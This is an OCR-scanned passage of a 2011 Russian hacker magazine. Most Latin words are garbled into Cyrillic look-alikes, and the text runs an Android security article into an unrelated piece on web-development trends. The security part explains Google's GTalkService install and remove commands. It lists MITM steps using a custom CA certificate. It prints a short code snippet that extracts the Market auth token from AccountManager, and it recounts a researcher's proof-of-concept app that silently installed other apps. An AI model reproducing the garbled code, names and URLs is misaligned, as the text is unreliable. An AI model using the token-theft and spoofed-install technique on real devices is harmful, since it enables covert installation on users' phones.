С1 — был запущен в США и Великобритании в октябре 2008 года. 
Начало стремительного распространения платформы связывают 

с появлением смартфона Мо{ого[а Огоа в ноябре 20079 года. С тех 
пор количество девайсов, которые ежедневно активируются, растет 
феноменальным образом. На последней конференции бооч(е |/0 
была заявлена баснословная цифра: 400 000 активаций каждый 
день! Только подумай: это половина населения Кипра или, к приме- 
ру, целый Бруней. Всего на данный момент активировано более 100 
миллионов устройств на Апаго!а. Неплохо. А теперь представь, что 


каждым из них Сооде может хоть немного, но управлять. Возможно, 


я слегка утрирую и слово «управлять» тут не самое подходящее. 
Достоверно известно, что боо4(е может устанавливать и удалять 

произвольные приложения через механизм СТаК5егисе. Связы- 
вая это с впечатляющей статистикой активаций новых устройств, 
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волей-неволей задумываешься о потенциально самом большом 
ботнете в мире, в который пользователи сотнями тысяч входят до- 
бровольно. И хотя идея попахивает научной фантастикой, мне было 
интересно разобраться во внутренностях механизма СТаКЗег\щсе. 
Какон устроен? В каком виде на устройства приходят сообщения 
отсервера? Насколько защищен канал передачи? Нетли опасно- 
сти, что сообщение суправляющими командами на мое устройство 
может отправить кто-то еще? 


Все дело в СТа!К$егмсе 


Любой девайс на Апаго!4 поддерживает постоянное ТСР/551/ 
ХМРР-соединение с серверами СТа(К. Все время, когдау него 
есть доступ в Сеть. Соединением управляет специальный сервис 
СТаКбегме. Он постоянно отправляет пинги (так называемые 
«Леагфеа“-сообщения»)] на сервера боод(е, чтобы проверить 
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МоНйсаНоп$ 


А Тули: ЕсИрзе Ргемеми 


Кетоуедй гот усцг рПопе. 5:40 РМ 


А Коог$1гар 


Кето\уед тот уоуг рпопе. 5:40 РМ 


Приложения удалены по команде бооде 


активность соединения, а в случае обрыва связи автоматически 
переподключается. Этот канал связи позволяет боо4(е осу- 
ществлять удаленное управление устройствами. Отправленное 
через СТаК5егмусе сообщение непременно попадает на каждый 
смартфон. С помощью этого механизма в части работает сервис 
С20М (С!оца то Ое\се Меззадтад Егагпем/огК], с помощью которого 
разработчики могут отправлять приложениям, установленным на 
смартфонах пользователей, специальные команды (к примеру, на 
загрузку обновлений). Правда, пока С20М ограниченно доступен 
лишь для некоторых разработчиков, которые оставили специаль- 
ную заявку. Известно, что ОС Апаго!4 поддерживает как минимум 
две команды: КЕМО\УЕ_АЗЗЕТ и [М5ТАЕЕ_АЗЗЕТ, позволяющие 
Соод(е удалять и устанавливать произвольные приложения. 

Таким образом, обнаружив в Апаго!а Магкеге малварь, инжене- 

ры компании могут отправить сообщение КЕМОУЕ_АЗЗЕТ через 
СТаКЗ$егисе, и зловредная программа будет разом удалена со всех 
подключенных кинету устройств. Этим, какмы знаем из новостей, 
компания не раз пользовалась. И обратная ситуация. Кактолько 
Соод(е отдает команду ИМ5ТАНЕ _АЗЗЕТ, каждый получивший сооб- 
щение смартфон на Апаго!4 скачивает АРК-дистрибутив с програм- 
мой и инсталлируетее. Такая возможность с одной стороны хороша: 
Соод{[е может оперативно удалить всю появляющуюся малварь. Нос 
другой стороны, пугает. А что если кто-то сможет реализовать МИТМ- 
атаку на 551 -соединение конкретного телефона до СТа\$егмсе и 
проспуфить сообщение ИМУТАЕЕ_АЗЗЕТ, чтобы залить нателефон 
какую-нибудь заразу? Безопасна ли система? 


Надежность канала данных 


Не будем рассматривать вариант с захватом инфраструктуры 
Соод(е, через которую теоретически можно было бы загрузить про- 
извольное приложение сразу на все Апаго!4-девайсы. На данном 
этапе будем считать это фантастикой. А вот что кажется более 
реальным, так это отправка фейковых команд на конкретный де- 


Процесс установки приложения в картинках 


Приложение 
Апдо!а Магке{ 


СТа[К $егмсе 


Механизм 
оплаты 


[НТТР://ММАМ 


р ИпК5 

Статья подготовлена 
по материалам иссле- 
дователя Джона Обер- 


хейда ({оп.оБегре!е. 
ога]. 


Интерфейс СТаК $егисе Мопйог 


вайс. Да, подключение СТа(кЗегмсе, какя заметил выше, является 
защищенным: все данные передаются через 551. Таким образом, 
базовая безопасность и целостность сообщений гарантируется 

уже самим протоколом. Но мы-то знаем цену этим гарантиям (читай 
материал «Вскрываем 551» в 125 номере ||]. При желании 551 - 
соединение можно скомпрометировать, перехватить и отревер- 
сить пакеты, передаваемые между девайсом и серверами бооц(е. 
Если разобраться в их структуре и правильно подделать сообще- 
ние |М5ТАЕЕ_АЗЗЕТ, то мы можем принудительно установить на 
устройство произвольное приложение. Теоретически. Вопрос втом, 
есть ли еще какой-нибудь уровень защиты, например, цифровая 
подпись? Чтобы исследовать поступающие от боо4(е ‘а сообще- 
ния, их надо получить. Ты сейчас можешь подумать, что придется 
включить снифер и ждать, пока инженеры компании вновь отправят 
через СТаК5егисе команду ИМЪТАЕЕ_АЗЗЕТ. Но когда это будет? На 
самом деле все проще. Забегая чуть вперед, скажу, что эта же самая 
служба используется всякий раз, когда пользователь устанавливает 
сообщения через Апаго!а МагкКе{. Нажатие кнопки «п${аЦ» приво- 
дит ктому, что через СТа[КЗегмсе отправляется |М5ТАЕЕ_АЗЪЕТ, 
которая инициирует на устройстве процесс загрузки нужного 
АРК-пакета программы и ее установки. Мы об этом еще поговорим, 


Запрос 
на установку 


Серверы 
>| Апаго!а Магке{ 


Сообщение 
МЭТАЕЕ АЗЪЕТ 


Хостинг 
АРК-пакетов 


Загрузка АРК-пакета 
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асе! в чистом виде 


бы сы 


РОбТ-запрос Апаго« М 


сейчас же важно одно: получить для исследования сообщение 
|МУТАЕЕ АЗЗЕТ — не проблема. В общем-то, для просмотра трафи- 
ка (несмотря нато, что он передается через 55| -соединение} нужно 
совсем немногое: 

1. Достать образ Апдго!9-эмулятора, в котором включена возмож- 
ность работы с Апаго!а МагкеГ ом. 

2. Добавить свой СА-сертификат в хранилище /зуз{егп/е{с/зесигКу/ 
сасе{$.6К, используя Ке{оо[ или ропес(е. 

3. Реализовать МП М-атаку, заюзав $$[$п1 [млм {Воцаб{сгигпе.ога] с 
СА-сертификатом. 

Теперь, когда СТа[КЗегмсе захочет установить соединение, мы 
сможем перехватить трафик, поскольку устройство доверяет СА- 
сертификату, который мы создали. Если попробовать установить 
какое-нибудь приложение из Апаго!а МагкеГа на эмуляторе, то мы, 
соответственно, отснифаем сообщение ИМ5ТАЕЕ_АЗЗЕТ. Оно будет 
выглядеть примернотак: 


{1сК1е_14: 1277687266074 

аз5е{14: -155863831473120556 

аз5е{ пате: Кер11са Т5]апа 

аззее_ фуре: САМЕ 

аз5еф расКаёе: сот.гер11са.гер11са1$1апа 
аз5ет_61об иг1: Ир: //апаго1А.с11еп%$. 
50051е.сот/тагКет /4омп]1оаЯ9/Бомп1оаа?а$е*Та= 
-155863831473120556&и5егТ4=986032118775& 
деу1сеТа=1094117203906638597 
аз5е*_$15пафиге: Ауп26МОаскокКК$ВУ4ЗигуСЕрУум@ 
аз5е{ $17е: 5144485 


Большинство параметров описывают приложение, которое 
пользователь запросил из Апаго!4 МагкеГа. Интерес пред- 
ставляет атрибут аз5е{_$51дпафиге. Можно предположить, что 
это криптографическая подпись сообщения 1МУТА[ | _АЗЗЕТ, с 
помощью которого дополнительно гарантируется его целост- 
ность. Увы, это не так. Энтузиастами давно установлено, что это 
не что иное, как кодированный в Базеб4 хэш АРК-файла (Т.е. 
дистрибутива программы), который пользователь запросил из 
Апагота Магкега. Мы лишь можем в этот раз убедиться, скачав 
АРК-пакет и выполнив соответствующие преобразования с 
его контрольной суммой. Становится понятно, что никакой 
дополнительной защиты для сообщения |М5ТАЕЕ_АЗЗЕТ (и, 
стало быть, любых других] нет. Если атакующий сможет пере- 
хватить 55 -соединение между С Та[КЪег\утсе, то теоретически 


сможет передать на телефон произвольные сообщения, в том 
числе, для установки приложений! Конечно, есть много «но», 

и представить в деле такую атаку довольно сложно. Для этого, 
по меньшей мере, нужно находиться с жертвой в одной сети, 
чтобы иметь возможность реализовать МТ М-атаку. Не может 
идти и речи о каком-то массовом заражении пользователей. 
Это не умаляет недостаток защищенности канала связи, но пер- 
спективы к эксплуатации недоработок тут, откровенно говоря, 
слабые. Поэтому не будем на этом больше останавливаться, а 
посмотрим, какиееще сюрпризы таит в себе платформа Апаго!а 
и механизм СТа[КЗег\утсе. 
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БАЛА Героев 
поеззве 


Структура запроса после декодирования из ргоюБи! 


Взаимодействие с Апагоа МагКе? 


Вышея сказал, что СТа[КЗегмсе вовлечен в процесс установки при- 
ложений из Апаго!а Магкега. Это вообще интересная история. Тут 
тоже есть интересные нюансы. Рассмотрим для начала этапы, кото- 
рые проходит пользователь для установки программы из маркета: 
1. Запуск Апаго!а МагКЕЕ. 

2. Поиск нужной приложения для установки. 

3. Нажатие на кнопку «п$аЦ». 


4. Подтверждение необходимых для приложения привилегий. 

5. Закачка и установка приложения. 

После этого у пользователя в панели оповещений выводятся со- 
общения о загрузке и установке приложения. Все просто и про- 
зрачно, но... Если посмотреть на процесс изнутри, то все происходит 
несколько сложнее. Если первые четыре шага выполняются прило- 


жением Апаго!4 Магкее, то за пятый (самый важный] этап отвечает 
совершенно другой компонент системы, а именно уже знакомый 


СТаКбегусе. Схема работы [см. иллюстрацию для большего пони- 
мания] выглядит следующим образом: 

1. Пользователь кликает на кнопку установки приложения в Апдго!а 
Магкеге. 

2. Приложение отправляет РО$Т-запрос на серверы Апаго!а МагКЕ. 
3. Серверы Апагоа МагКе{ отправляют информацию о запросе на 
установку приложения системе С20М. 

4. Серверы С2?0М отправляют смартфону пользователя сообщение 
|МУТАЕЕ_АЗЗЕТ через подключение СТа[К5егисе. 

5. Компонент С Та(К5егмсе принимает сообщение 1МТАЕЕ_АЗЪЕТи 
активирует Уеп@та-компонент. 

6. Уеп@тд-компонент скачивает АРК-пакет приложения и, в конце 
концов, устанавливает приложение. 

Первое, что вызывает интерес — это, конечно же, РОЗТ-запрос, 
который передается на сервер. Раз его может отправить Апаго!а 
МагКе\, то, возможно, это сможем сделать и мы с помощью специ- 
ального приложения? Попробуем разобраться. 

Перехваченный запрос выглядит следующим образом: 


РОТ /тагКеф/ар1/Ар1Веачие$* НТТР/1.1 

Сопфепе-ЁЕепёП: 524 

Сопфеп*-Туре: арр]1са{1оп/х-ммм-Когт-иг1епсоаеа 

Но$*: апаго1а. с11еп{$ .=50051е. сот 

Соппес*1от: Кеер-А11уе 

У5ег-Авеп*: Апдго1а-Магкее/2 (агеат 9ВС83); 271р 
уег510п=2&гедие{=СиАССУУВКЕРВОЧЕЕОЕЕРВОУ у? ИМЕ\Мбо4ес\/40\/В 
Заиэ’.. ... 


Все банально, кроме параметра гедие<\, в котором очевидно и 


прячется все интересное. Зная бооц(е, легко можно предположить, 
что это данные, упакованные в фирменную структуру рго{оБч{ (соде. 
дооа(е. сот/р/рго{оБий и кодированные после этого в Базеб4. Так 

и есть. Декодировав хэш и распаковав структуру, получаем данные 
запроса: 
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6 5-5 ЕТС ПЕ 
СИИ 


Ты ее М р де 


лгал: Бани. Пг Бату Шт. 


№ гаи есабння Терон 


Тр стар гай вей | 


Установка фейковых приложений 


1 { 
1: "БОАААКЗАААВОееот) 8хех9т1Т1о0 ..." 
2:9 
[... Вырезано ...] 
13: "-60649630004а480а63" 
} 
2 
10 { 
1: "353999319718585473" 
} 
} 


Уже что-то, но есть проблема: мы не знаем, за что отвечает тот 

или иной параметр. Скорее всего, это некоторые идентификаторы 
девайса, информация о платформе, некоторые данные для автори- 
зации и, конечно же, идентификатор запрашиваемого из МагкеГа 
приложения. Гутнадо сказать, что для многих структур ргофоБч1, 
которые участвуют в работе с Апагоа МагКе\, доступно описание, 
составленное энтузиастами в результате реверсинга. А на сайте 
соде.дооа(е.согп/р/апЧго!Ч-плагке{-ар! даже выложен коллективно 
написанный АР!, позволяющий запрашивать различные данные 
из маркета [описание, иконки программ ит.д.]. Правда, данныхо 
структуре запроса на установку приложений там нет. Зато реверсинг 
выполнил известный исследователь Апаго!9-платформы Джон 
Оберхейд, который впоследствии реализовал интересную атаку, о 
которойя и хочу тебе рассказать. Итак, структура запроса в сокра- 
щенном виде выглядиттак: 


[.. вырезано ..] 
те$5аёе Тп$Фа11Кедие$* { 
ор{1опа1 $%г1па аррта = 1; 


} 
тез5аре Кедче{Соп*ех* { 
геди1геа $+г1п= ацеПТокКеп = 1; 
[.. вырезано ..] 
геди1геа $+г1п= апаго1аТа = 4; 


ор{1опа1 $%г1па аеу1сеАпа$АК\ег$1оп = 5; 
[.. вырезано ..] 


Большинство полей из запроса могут быть извлечены из самого 
девайса (например, язык интерфейса, версия системы ит.д.]. Но 
только не параметры арр!4 иац{ТокКеп: 

» арр!4 — является уникальным идентификатором приложения 

в Апаго!а Магкеге. Этот идентификатор нигде не отображается, 
поэтому единственный способ его получить — запросить приложе- 
ние из Апдго!а МагкеГа и отснифать трафик, вытащив из ргофобБчу{- 
структуры его идентификатор. 

» аш{ПТоКеп — это токен системы СЦеп{одтт, с помощью которого 
серверы Апаго!4 МагкеГа могут провести аутентификацию твоего 
запроса. 
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Если аи{В ТоКеп остается в секрете, то проспуфить запрос не выйдет. 
Но ты можешь заметить, что раз он естьу девайса, значит, в каком- 
то месте системы он все-таки хранится. 

Именно! Такое хранилище называется Ассоип{ Мападеги являет- 
ся важным компонентом платформы Апаго!а, предоставляющем 
данные для аутентификации. Например, если какое-то приложение 
хочет запостить в Т\/Щег сообщение, то ему необязательно знать 
логин и пароль для ТмиЦег-аккаунта — оно может запросить токен 
из Асоип{Мападег, который позволит ему отправить твит. Так вот 

в этом же самом месте хранится иацТокКеп, используемый для 
взаимодействия с серверами Апаго!4 Магке(. Но самое смешное из 
всей этой истории, что извлечь его можно буквально несколькими 
строчками кода: 


АссоупЕМападег ассоип{Мападег = 
Ассоип{Мапавег . вет (вефАрр11са*1опСоп*ех{()); 

АссочцпЕ асс* = ве{Ассоип* (ассочипМапавег); 

ассочип{Мападег. зеАицЕИТоКеп(асс®, "апагота", 
фа15е, пем бееАчЕНТоКепСа11Баск(), пи11); 


Что это значит? Получается, что у нас есть все данные, чтобы соста- 
вить ргофобч{-структуру, которую я привел выше, и сконструировать 
РОЗТ-запрос для отправки на серверы Апаго!а МагКе\. 

Если запрос будет корректным (а он будет, в чем ятебя уверяю}, то 
на устройство через СТа([К5егисе будет, соответственно, отправлено 
сообщение |МУТАЕЕ_АЗЗЕТ, что приведет к установке указанного 
нами приложения! А поскольку система устроенатак, что разре- 
шение на установку пользователь отдает еще до отправки запроса 
(опять же смотри схему}, то его вообще никто и ни о чем не будет 
спрашивать. И приложение установится в систему со всеми необхо- 
димыми разрешениями! 


Атака через приложение 


Теперь, когда мы знаем некоторые тонкости механизма установки 
приложений из Апагоа МагкеГа, можно рассказать об изящной 
атаке, которую удалось провернуть Джону Оберхейду. Идея такова. 
Если мы можем сами конструировать запросы на установку, то ни- 
что не мешает нам написать приложение, которое будет делать это 
автоматически. 

Если подобную функциональность добавить во вполне невинную 
программу и начать распространять через Апаго!4 Магке! (что при 
отсутствии контроля несложно}, то всем установившим ее пользова- 
телям можно в придачу загрузить все что угодно! Сказано — сдела- 
но. Джон написал РоС-приложение и назвал его Апогу Вига$ Вопи$ 
[ еуе[5, что должно было привлечь внимание пользователей Апаго!а 
Магке(. Простейшая социальная инженерия сработала: программу 
начали устанавливать пользователи. Наиболее внимательные из 
них наверняка замечали, что в области обновления появлялись 
сообщения об установке еще трех программ: для отслеживания 
месторасположения, осуществления звонков на платные номераи 
кражи контакт-листа. 

Все они действительно имели вредоносную функциональность, но 
никак не использовались. Тут надо сказать, что исследователь сразу 
после тестирования РоС сообщил о проблеме в боод(е, и компания 
уже пофиксила баг. 

Решение, кстати, оказалось очень простым. Система теперь отме- 
чает для себя все запросы на установку приложений, сделанные 
через Апаго!а МагКеЕ\, и проверяет, чтобы для входящего сообще- 
ния |М5ТАЕЕ_АЗЪЕТ был ранее сделан соответствующий запрос. 
Если Уеп@та-компонент получает сообщение 1МУТАЕЕ_АЗЪЕТ 
для приложения, которое он не ожидает, то команда просто игно- 
рируется. Казалось бы, проблемы больше нет. Но! В теле сообще- 
ния может находиться специальный флаг, который позволяет от- 
рубить проверку [в том числе для сохранения функциональности 
для удаленного удаления приложений}, но это уже немного другая 
история. = 
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Инструменты прогрессивных девелоперов 


© Угнаться за всеми появляющимися технологиями для создания 
веб-приложений невозможно. Да и незачем. Но за трендовыми 
решениями, которые проверены на реальных проектах гуру- 
разработчиками, следить нужно. Мы постарались отследить самые 
яркие тренды — и вот что получилось. 


Тренд 1. Отказ от $С%Е 


К современным веб-проектам предъявляются колоссальныетре- 
бования по части отказоустойчивости. Они должны выдерживать 
большие и очень большие нагрузки. Одним из самых трендовых 
способов увеличить быстродействие системы стал отказ от исполь- 
зования медленных 5$С1 баз данных и переход там, где это воз- 
можно, ктехнологиям по ОЕ, использующих для хранения данных 
простые структуры данных вроде «ключ-значение». То, что сложно 
было представить еще несколько лет назад, стало сейчас настолько 
очевидным, что многие не перестают удивляться: «Как это мы не 
дошли до этого ранее». Ведь для большинства веб-приложений 
вовсе не нужны все эти множестватипов данных, поддерживаемых 
СУБД, и средств их выборки. Часто необходимо просто сохранить 
информацию и иметь кней доступ с минимальной задержкой и вы- 
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сокой надежностью. 5@!-запросы, какни крути, даже при оптими- 
зации выполняются относительно медленно. При этом для хранения 
данных зачастую вполне достаточно просто хранить ключ записи и 
ее значение. Значение — это обычные сериализированные данные, 
например, в формате /5$О0М или более продвинутой структуре вроде 
пе5задеРак, боод(е Рго{оВИГили Арасве ТАтИ. Мопдо)В пошлаеще 
дальше, реализовав в качестве замены для удобного .)5ОМ специ- 
альный двоичный формат. Другая разработка — Кед!5 — перевернула 
понятие кКеу-уаие-хранилищ, добавив кним простые, но оказавшие- 
ся эффективными и востребованными списки, хэши и сортирован- 
ные массивы. Интерфейс доступа кпо5Ц([-базе также максимально 
прост — обычно это простейшие команды типа де! [получить данные 
по ключу), е{ (записать данные с ключом), де(«{е (удаляет ключ и его 
данные}, ирдае (обновляетуже существующие данные). На низком 


ХАКЕР 07 /150/ 2011 


Се МЕС сни САС ГГ 


ес Рени 


Облачные интерфейсы 


на заметку 


Если ты хочешь использовать возможности облачных сервисов 
в своих проектах, советую тебе воспользоваться некоторыми 
полезными вспомогательными инструментами. 

Арасве Миует [псибаогарасВе.ога/пимего] — попытка создать 
кроссплатформенный открытый интерфейс для работы с разны- 
ми с[оцд-платформами, включая Атагоп ЕС2, М'сгозоЕ Алиге и 
Соод[е АррЕпдте. В идеале, твоя программа сможет использо- 
вать ресурсы сразу нескольких облаков. 

ОеЦцасоч@ (псибаогарасве.ога/Че{асюи9] — решение на Кибу, 
умеющее работать со всеми известными (и не очень] с[оиа- 
провайдерами. Предоставляет единый КЕЗ$Т-интерфейс, кото- 
рый скрывает нюансы разных платформ. 

ИБсоча [Прсочц9.арасве.ога} — библиотека для программ на 
Уауа или Ру{оп, которая взаимодействует реально чуть ли не со 
всеми в мире известными облачными платформами и унифици- 
рует основные операции по созданию и управлению виртуаль- 
ными машинами. 

эитр(есоча (5тпр{есоудар!.ога] — если ты все еще про- 
граммируешь на РНР, то для тебя есть отличный компонент 
Гепа_СЦ она, который добавляет базовую поддержку хранилищ 
данных, очередей сообщений и другие фишки разных с<очц9- 
платформ просто в твое веб-приложение на Гепа Егагпемогк 
или даже на чистом РНР. 


уровнетакие базы строятся на базе хеш-таблиц и их разновид- 

ности — распределенной хеш-таблицы (ОНТ). Благодаря этому 
решения по5@Ц( оказались не только очень быстрыми, но еще и легко 
масштабируемыми. Свойства ОНТ такие, что можно присоединять 
новые серверы постоянно, итакая база будет расти и расти. Столько, 
сколько надо. При этом в самих приложениях ничего менять не надо, 
все делается автоматически! Это очень важно, потому что если 
приложение не может одинаково хорошо работать и на одном, и на 
тысяче серверов, то оно не масштабируемо. А значит при неожидан- 
но высокой нагрузке, оно ляжет и уже не сможет восстановить работу, 
даже при покупке новых серверов. В то время как обычные СУБД 
просто рвутся на части и подпираются костылями, чтобы работать 
хоть на паре десятков серверов одновременно, практически любое 
по5Ч[-решение может спокойно масштабироваться хоть на тысячу 
серверов. И все это на скоростях более 100 тысяч операций в секунду, 
над гигабайтами данных и миллионами ключей на обычном железе. 
За примером далеко ходить не нужно. ЕасебоокК использует собствен- 
норучно разработанное по Е -решение Саззапагаа Тм/ег, которое 
опирается в работе на связку Саззапага итехнологии НВазе. 
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Т 2. дЗауазсир} 
на стороне сервёра 


В погоне за производительностью разработчики активно использу- 
ют не только новые методы хранения данных, но и прогрессивные 


› 029 


СКЕАТЕ 


РНРЕод — самый крутой облачный хостинг для твоего 
РНР-проекта 


технологии для написания кода. Тутявный тренд — более продвину- 
тое использование /]ауа5стри. Не пойми меня неправильно: конечно 
же, ни один серьезный веб-проектне может обойтись без большого 
количества ./5-кода. Реализация фронтенда (т.е. интерфейса при- 
ложения] практически всегда реализуется именно с помощью этого 
языка, какая бы технология ни применялась для создания бэкэнда. 
Но! Пытливые умы почесали головы и подумали: а не будетли легче 
использовать 5 более универсально: и на клиенте, и на сервере? Он 
гибкий, что позволяет писать код в разных парадигмах: от обычного 
процедурного до ООП в смеси с функциональным стилем. Простой. 
Но что важнее всего — его асинхронность и неблокируемость. Это 
важный плюс по сравнению со, скажем, обычным РНР-скриптом, 
который непременно блокируется во время выполнения: напри- 
мер, в ожидании выборки из базы данных или ответа от другого 
сервера. Код выполняется последовательно: пока не будет получен 
ответ, сценарий будеттупо простаивать. В случае с ]Лауаэспр\ты 
просто указываешь, какую функцию необходимо выполнить, когда 
произойдет определенное событие, и все. В это время другой код 
может спокойно выполняться. Все строится на событиях и функциях, 
которые эти события обрабатывают [так называемые саЦБасК'’и или 
обработчики событий). Ктакому подходу нужно привыкать, но чтобы 
сделать жизнь проще, были разработаны специальные фреймворки. 
Одним из самых продвинутых стал проект Моде../5 [подробнее о нем 
ты можешь прочитать в 139 номере |]. В основе его лежит \8, движок 
]ауаспр\, который используется в браузере боод(е СВготе и благо- 
даря которому он работает невероятно быстро. Это не пустые слова. 
К использованию Модбе..)5 меня подтолкнул простой эксперимент. 
На работе я сделал простенький НТТР-сервер [ну честно, 10 строчек 
кода] и попробовал его протестировать на нагрузку. В ситуации, когда 
уже падал наш Матх-сервер, приложение на Моде..)5 спокойно про- 
должало принимать подключения и работать как ни в чем не бывало. 


Тренд 3. Использование 
ункциональных языков 


Асинхронность — это, конечно же, конек не только Лауа5спр\. Для 
Ру{поп хорошие ребята придумали фреймворки Тмл${ед и Тогпадо, 
для Кибу есть Еуеп(Масрте, для РНР — рЮрО/еатоп с честным 
Та${са!, для Дауа — МеЦу. Но помимо примочек для самых обычных 
языков программирования, все большую популярность набирают 
функциональные языки и платформы. Например, Е[апд, который 
специально разработан для создания распределенных систем ком- 
панией Ег!с$5оп. Сейчас найдется немало людей, которые скажут, 
что Е[апа рулит и прочих равных обставляет всех конкурентов, 
эффективно обрабатывая сотни тысяч потоков и умело занимая все 
доступные ядраи серверы. И не просто скажут, а приведут реальные 
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СИНиЬ — социальная сеть для твоего кода. А система 
контроля версий и управления проектами — в придачу! 


примеры. Одна проблема: втаком коде сам черт ногу сломает, аесли 
твой программист вдругуйдет, то проектс большой вероятностью на 
некоторое время встанет. Специалистов пока очень мало. Еще одно 
развивающееся направление — 5са[а. Это мощный, смешанный 
объектно-ориентированный и функциональный язык со статиче- 
ской типизацией и встроенной параллельностью. Шутка ли, ГумЦег, 
наконец, слезс Кибу-иглы и переписал большую часть критичного 
кода на 5са(а! Это что-то да означает. Эса[а часто используется в 
связке с платформой АкККа, для которой не чужды понятия «многопо- 
точность», «устойчивость к сбоям», «распределенная архитектура», 
«реалтайм». Фреймворк основан на распараллеливании вычисле- 
ний в виде акторов [небольшие блоки кода, которые самостоятельно 
планируются для исполнения по разным ядрам, процессам и даже 
узлам кластера]. Функциональные языки активно используются в 
тех проектах, где пользователю нужна работа в реальном времени. 


Тренд 4. Реалтайм для веба 


Да-да, для многих веб-приложений стало крайне важным работать 
в режиме реального времени, с минимально возможными задерж- 
ками. Задача, которая непросто решается даже для нескольких 
пользователей, становится огромной проблемой, когда счет юзеров 
идетна сотни тысяч. Сейчас уже есть немало решений, позво- 
ляющих реализовать реалтайм для веба [мы рассказывали про 
технологию Сотпе\), но самой прогрессивной и многообещающей 
технологией являются так называемые веб-сокеты. Все уже устали, 
что в браузере утебя есть только НТТР и ничего больше, да итот 
урезанный и затиснутый в ограничения безопасности. Конечно, 
вражеский Е(а$В заботливо подсуетился и предложил альтерна- 
тиву, но кому он теперь нужен? Реализовать реалтайм на основе 
привычного НТТР очень сложно: на каждый чих ему нужно созда- 
вать новое соединение, снова и снова гоняя хотя бы пару килобайт 
данных туда-сюда и ожидая в среднем полсекунды. На деле имеем 
не реалтайм, а скорее костыли. Создатели десктопных приложений 
потирают руки: у них-то есть полный доступ к системе и возможность 
использовать сеть напрямую на низком уровне. Нов НТМЕ5 (уже 
даже не хочется лишний раз его упоминать} появится расширение 
\Меб5осКе{$, которое реализуетте же самые сокеты, но в браузере. 
Сокеты для любого веб-приложения — кактебе? Раз соединившись 
с сервером, ты можешь держать открытым канал передачи [в обе 
стороны) сколько угодно долго и пересылать по нему любые данные. 
Без задержек и лишних тормозов — все ограничивается лишь ка- 
налом связи. Как только у сервера появятся новые данные длятебя, 
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То, чем так хотел быть птетсасКеа, но никогда 
не станет. 
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Мойе.)5 — открытие этого года 


ты сразу их получишь. И наоборот. Увы, до полноценной реализа- 
ции этой технологии еще далеко. Многие разработчики кинулись 
создавать различные проекты, вешая на нихярлык реалтайма. Но 
вотв чем проблема: подходящего сервера до сих пор нет! Любимый 
Мадгпх, хоть и добравшийся уже до версии 1.0.3, увы, никак не умеет 
работать с сокетами. Просто все существующие веб-сервера пока 
не умеют корректно работать в ситуации, когда клиенты не про- 

сто пришли, сделали запрос и отвалились до следующего сеанса 
связи (пусть даже раз в секунду, по меркам сервера это очень много 
времени), а постоянно висят на связи. Воттут-то и пригодился 
новомодный /ауаЪсг!р{ на стороне сервера. Благодаря Мосде..)5 
подходящий сервер подчас можно написать за вечер. При этом он 
будет держать столько постоянно открытых соединений, сколько 
позволяттебе ресурсы сервера (размер памяти и настройки ядра ОС 
и сетевого стека]. 


Тренд 5. Развертываемость 
и расширяемость 


Раз уж мы вспомнили про аппаратные ресурсы, то самое время 
поговорить, пожалуй, про самый главный тренд не только в раз- 
работке, но и вообще во всей !Т-отрасли — облачные технологии. То, 
насколько с[оча-сервисы упростили жизнь при создании сложных 
проектов сложно переоценить. Простой пример — всем извест- 

ный сервис Огорбох. Разработки не стали изобретать велосипед 

с разработкой технологии для хранения данных, а использовали 
облачный сервис для хранения данных Аталтоп 53. Тут все просто. 
Сколько надо места для файлов — столько у тебя и будет. Какая будет 
нагрузка — такую сервис и выдержит. Только за каждый гигабайт 
хранилища и трафик нужно заплатить. С серверами все аналогично. 
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Документо-ориентированная система управления 
базами данных, не требующая описания схемы таблиц 


Нужен только один — пожалуйста. Нужен кластер из 16 сервераков 
сразу — нет проблем. Если вдруг нагрузка на приложение увели- 
чилась и нужно масштабировать систему, то это можно сделать 
буквально за несколько минут. Такую услугу, в частности, предлагает 
все та же компания Атагоп [по сути, это настоящий лидер отрас- 
ли], предоставляя технологию ЕС2. Впрочем, многим вообще не 
нужны никакие серверы — им важна готовая инфраструктура для 
развертывания своих разработок из «коробки». Хостинг платфор- 
мы (Р(аМогп аз а бегмсе или Раа5} — то, что сейчас набирает все 
большую и большую популярность. Это неудивительно. Добрые 
дяди затебя уже поставили и настроили все, что может пригодиться 
для твоего приложения. Взяли несколько языков, типа РНР, Кибу 
вместе с Ка{$, обязательный Ру{Поп и выскочку Моде..)5, прицепили 
традиционную базу данных МУЗОГ, а чтобы эстеты замолчали, доба- 
вили немного перчинки в виде Мо59Е — Мопдо[ В, Кед!$ или Мак. 
Поверх поставили гегпсасВеф, а вместо анахронизма в виде ЕТР 

— теперь предлагают юзать распределенную систему управления 
версий СК. Все это управляется через красивый веб-интерфейс, в 
котором можно просто сказать: «Хочу пять серверов тетсасвед, 
два РНРиеще базу данных заверните». Тебе тутже выдают ключи 
доступа и пароли — и все, можно действовать. Команды «9 сюпе 

& & 9ЦризП» — и воттвое приложение уже вольготно себя чувствует 
на серверах, аты даже не подозреваешь, на чем и где оно крутится. 
Помимо этого разработчикам предлагается специальный АР!, чтобы 
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Очегу для мобильных устройств 


программа могла сама себе выделять ресурсы, например, добав- 
ляя еще одну базу данных или новый инстанс приложения. Среди 
автоматизированных с[оид-платформ можно выделить: АррЕпадте, 
РНРЕод, Агиге, КаскС оча. 


Тренд 6. Социализаци 
июл Чия 


Я не зря в предыдущем разделе упомянул СК. Постоянно обща- 

ясь в среде разработчиков, не перестаю замечать, как ЕТР и $\/М 
стремительно теряют популярность. Все потихоньку переходит на 
Ск. Поправил файлик, добавил немного гениального кода и хочешь 
его выкатить на хостинг? Сначала закоммить его в бК-репозиторий, 
напиши комментарий, что хорошего ты там накодил, а потом только 
разверни на сервере, причем при помощи все того же С\'’а. И ведь 
действительно удобно: и разработка, и деплой идет при помощи 
одной системы. Все в командной строке. Посмотрев на популяр- 
ность сервиса СИНиВ ([9(Виб.сого}, многие провайдеры, чтобы при- 
влечь разработчиков и облегчить им жизнь, стали разворачивать у 
себя Сц-репозитории как единственную возможность что-то залить 
на сервер. Ну, теперь хоть не будет криков, что снова Вася нето 
залил на сервер и все перестало работать. Впрочем, используемый 
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Кодинг без границ 


инструмент — это всего лишь частность. Сам подход к разработке 
кода немного поменялся. Если раньше все твои друзья сидели уют- 
но и втихаря что-то там программировали, то теперь большинство 
перебралось на сервисы вроде СиНиБ'а и занимаются «социаль- 
ным кодингом». С приходом СК’а стало намного проще следить за 
прогрессом твоих любимых библиотек. Если что-то надо срочно по- 
править в чужом коде, так без проблем: кнопка «форк» теперь также 
близко, как и кнопка для создания тикета. А чтобы автор заморского 
